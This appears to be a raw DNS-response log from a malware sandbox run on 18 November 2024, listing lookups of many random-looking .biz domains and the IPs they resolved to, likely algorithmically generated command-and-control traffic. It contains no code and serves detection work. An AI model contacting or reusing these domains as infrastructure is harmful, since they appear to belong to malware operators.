                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.694286108 CET1.1.1.1192.168.2.70xf224No error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.557564020 CET1.1.1.1192.168.2.70xd0f3No error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.947385073 CET1.1.1.1192.168.2.70x5ab1No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.067507029 CET1.1.1.1192.168.2.70x8c7fNo error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.768191099 CET1.1.1.1192.168.2.70x2f85No error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.902379036 CET1.1.1.1192.168.2.70xa725No error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.218239069 CET1.1.1.1192.168.2.70x46fbNo error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.220998049 CET1.1.1.1192.168.2.70x5714No error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.202855110 CET1.1.1.1192.168.2.70xe9dfNo error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.321006060 CET1.1.1.1192.168.2.70x48a1No error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.510687113 CET1.1.1.1192.168.2.70x9d7No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.689127922 CET1.1.1.1192.168.2.70xc60aNo error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:53.559895039 CET1.1.1.1192.168.2.70x3aa3No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.161140919 CET1.1.1.1192.168.2.70x2c0eNo error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.841682911 CET1.1.1.1192.168.2.70xc2a8No error (0)xccjj.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.050949097 CET1.1.1.1192.168.2.70x8767No error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.692286968 CET1.1.1.1192.168.2.70xbcdeNo error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.335134983 CET1.1.1.1192.168.2.70xacb5No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.383213043 CET1.1.1.1192.168.2.70xb5d2No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.245996952 CET1.1.1.1192.168.2.70xe248No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.813620090 CET1.1.1.1192.168.2.70xd22No error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.238250017 CET1.1.1.1192.168.2.70x31c4No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.045542955 CET1.1.1.1192.168.2.70xf46aNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.722193956 CET1.1.1.1192.168.2.70x8df8No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.396294117 CET1.1.1.1192.168.2.70xaaa9No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.891525984 CET1.1.1.1192.168.2.70x332No error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.100265980 CET1.1.1.1192.168.2.70x56dcNo error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.400401115 CET1.1.1.1192.168.2.70x1164No error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.561991930 CET1.1.1.1192.168.2.70x712cNo error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.073455095 CET1.1.1.1192.168.2.70x5d30No error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.247343063 CET1.1.1.1192.168.2.70x97c2No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.068376064 CET1.1.1.1192.168.2.70x7d75No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.210612059 CET1.1.1.1192.168.2.70xebc7No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.600533009 CET1.1.1.1192.168.2.70x1f14No error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.912170887 CET1.1.1.1192.168.2.70x2ecNo error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.912170887 CET1.1.1.1192.168.2.70x2ecNo error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.105413914 CET1.1.1.1192.168.2.70xa2f0No error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.824865103 CET1.1.1.1192.168.2.70x4ff7No error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.428832054 CET1.1.1.1192.168.2.70x22b7No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.675997972 CET1.1.1.1192.168.2.70xec25No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.375482082 CET1.1.1.1192.168.2.70x9055No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.595531940 CET1.1.1.1192.168.2.70x6dbcNo error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.277899981 CET1.1.1.1192.168.2.70x618No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.379904032 CET1.1.1.1192.168.2.70x9d14No error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.166512012 CET1.1.1.1192.168.2.70xc56aNo error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.247818947 CET1.1.1.1192.168.2.70x6664No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.037100077 CET1.1.1.1192.168.2.70x99cbNo error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.092307091 CET1.1.1.1192.168.2.70x321bNo error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.949701071 CET1.1.1.1192.168.2.70x45c2No error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.642368078 CET1.1.1.1192.168.2.70x2757No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.748471975 CET1.1.1.1192.168.2.70x8e44No error (0)cikivjto.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.341084957 CET1.1.1.1192.168.2.70x4723No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.604540110 CET1.1.1.1192.168.2.70x2a62No error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.765487909 CET1.1.1.1192.168.2.70x9a88No error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.106720924 CET1.1.1.1192.168.2.70x7cf1No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.473191023 CET1.1.1.1192.168.2.70xc779No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.943305969 CET1.1.1.1192.168.2.70x2bdcNo error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.176996946 CET1.1.1.1192.168.2.70x6becNo error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.112297058 CET1.1.1.1192.168.2.70x66d7No error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.112297058 CET1.1.1.1192.168.2.70x66d7No error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.113336086 CET1.1.1.1192.168.2.70x66d7No error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.113336086 CET1.1.1.1192.168.2.70x66d7No error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.133760929 CET1.1.1.1192.168.2.70xfd9fNo error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.155404091 CET1.1.1.1192.168.2.70xfd9fNo error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.846528053 CET1.1.1.1192.168.2.70xdb49No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.591638088 CET1.1.1.1192.168.2.70xff2aNo error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.616041899 CET1.1.1.1192.168.2.70xb7adNo error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.452527046 CET1.1.1.1192.168.2.70xc6a7No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.143625021 CET1.1.1.1192.168.2.70xf26No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.022378922 CET1.1.1.1192.168.2.70x251bNo error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.155771971 CET1.1.1.1192.168.2.70x28eNo error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.155805111 CET1.1.1.1192.168.2.70x28eNo error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.846698999 CET1.1.1.1192.168.2.70xf2ebNo error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.890394926 CET1.1.1.1192.168.2.70x13edNo error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.702167034 CET1.1.1.1192.168.2.70x6491No error (0)ereplfx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.900300980 CET1.1.1.1192.168.2.70x9be0No error (0)cikivjto.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.563630104 CET1.1.1.1192.168.2.70x3bceNo error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.765955925 CET1.1.1.1192.168.2.70xc094No error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.059454918 CET1.1.1.1192.168.2.70x7644No error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.252558947 CET1.1.1.1192.168.2.70x4b40No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.556916952 CET1.1.1.1192.168.2.70x17c2No error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.710139036 CET1.1.1.1192.168.2.70xd98eNo error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.406223059 CET1.1.1.1192.168.2.70xbde7No error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.406423092 CET1.1.1.1192.168.2.70x53eNo error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.097002029 CET1.1.1.1192.168.2.70xbe96No error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.098444939 CET1.1.1.1192.168.2.70xde75No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.820867062 CET1.1.1.1192.168.2.70xed05No error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.592092991 CET1.1.1.1192.168.2.70xaec3No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.435739994 CET1.1.1.1192.168.2.70x3ff2No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.452827930 CET1.1.1.1192.168.2.70x3ff2No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.470834017 CET1.1.1.1192.168.2.70x1a92No error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.470849991 CET1.1.1.1192.168.2.70x1a92No error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.171827078 CET1.1.1.1192.168.2.70x3d62No error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.173072100 CET1.1.1.1192.168.2.70x777cNo error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.074729919 CET1.1.1.1192.168.2.70xbeedNo error (0)ereplfx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.677510023 CET1.1.1.1192.168.2.70x6e49No error (0)ihcnogskt.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.944257975 CET1.1.1.1192.168.2.70xbe2bNo error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.566488028 CET1.1.1.1192.168.2.70x2447No error (0)kkqypycm.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.427711010 CET1.1.1.1192.168.2.70xdb83No error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.926429033 CET1.1.1.1192.168.2.70xc878No error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.226114035 CET1.1.1.1192.168.2.70xbcfNo error (0)uevrpr.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.798254967 CET1.1.1.1192.168.2.70xc57eNo error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.798295021 CET1.1.1.1192.168.2.70xc57eNo error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.095590115 CET1.1.1.1192.168.2.70xb0b3No error (0)fgajqjyhr.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.488301039 CET1.1.1.1192.168.2.70x5d00No error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.962125063 CET1.1.1.1192.168.2.70x7b10No error (0)hagujcj.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.639116049 CET1.1.1.1192.168.2.70xc149No error (0)sctmku.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.960383892 CET1.1.1.1192.168.2.70xaceeNo error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.513390064 CET1.1.1.1192.168.2.70xdbc9No error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.993443966 CET1.1.1.1192.168.2.70x4027No error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.368411064 CET1.1.1.1192.168.2.70x42faNo error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.725897074 CET1.1.1.1192.168.2.70x5960No error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.073019028 CET1.1.1.1192.168.2.70x3dd5No error (0)dyjdrp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.940227032 CET1.1.1.1192.168.2.70x339bNo error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.204468012 CET1.1.1.1192.168.2.70x695No error (0)ihcnogskt.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.071475029 CET1.1.1.1192.168.2.70xe26bNo error (0)kkqypycm.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.591011047 CET1.1.1.1192.168.2.70x26No error (0)qvuhsaqa.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.459870100 CET1.1.1.1192.168.2.70x25cdNo error (0)apzzls.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.718513012 CET1.1.1.1192.168.2.70x54bfNo error (0)uevrpr.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.318339109 CET1.1.1.1192.168.2.70xd363No error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.139082909 CET1.1.1.1192.168.2.70xc543No error (0)fgajqjyhr.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.998436928 CET1.1.1.1192.168.2.70x3ebNo error (0)hagujcj.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.695607901 CET1.1.1.1192.168.2.70x727eNo error (0)sctmku.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.212111950 CET1.1.1.1192.168.2.70xf3c7No error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.564762115 CET1.1.1.1192.168.2.70x118fNo error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.081774950 CET1.1.1.1192.168.2.70x1f12No error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.415080070 CET1.1.1.1192.168.2.70xff25No error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.766370058 CET1.1.1.1192.168.2.70xb959No error (0)ltpqsnu.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.110938072 CET1.1.1.1192.168.2.70x6424No error (0)dyjdrp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.488208055 CET1.1.1.1192.168.2.70xa007No error (0)vnvbt.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.967355967 CET1.1.1.1192.168.2.70xf39No error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.576612949 CET1.1.1.1192.168.2.70x3f94No error (0)ypituyqsq.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.816905022 CET1.1.1.1192.168.2.70x56aeNo error (0)qvuhsaqa.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.272480965 CET1.1.1.1192.168.2.70x28d2No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.661731958 CET1.1.1.1192.168.2.70xb258No error (0)apzzls.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.124900103 CET1.1.1.1192.168.2.70x29No error (0)tltxn.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.517987013 CET1.1.1.1192.168.2.70xd312No error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.807523012 CET1.1.1.1192.168.2.70x51b5No error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.665997028 CET1.1.1.1192.168.2.70xd6ddNo error (0)giliplg.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.017503023 CET1.1.1.1192.168.2.70xe726No error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.526622057 CET1.1.1.1192.168.2.70xce04No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.002403975 CET1.1.1.1192.168.2.70x2b7eNo error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.424093962 CET1.1.1.1192.168.2.70xa417No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.688081026 CET1.1.1.1192.168.2.70x4589No error (0)ltpqsnu.biz18.208.156.248A (IP address)IN (0x0001)false
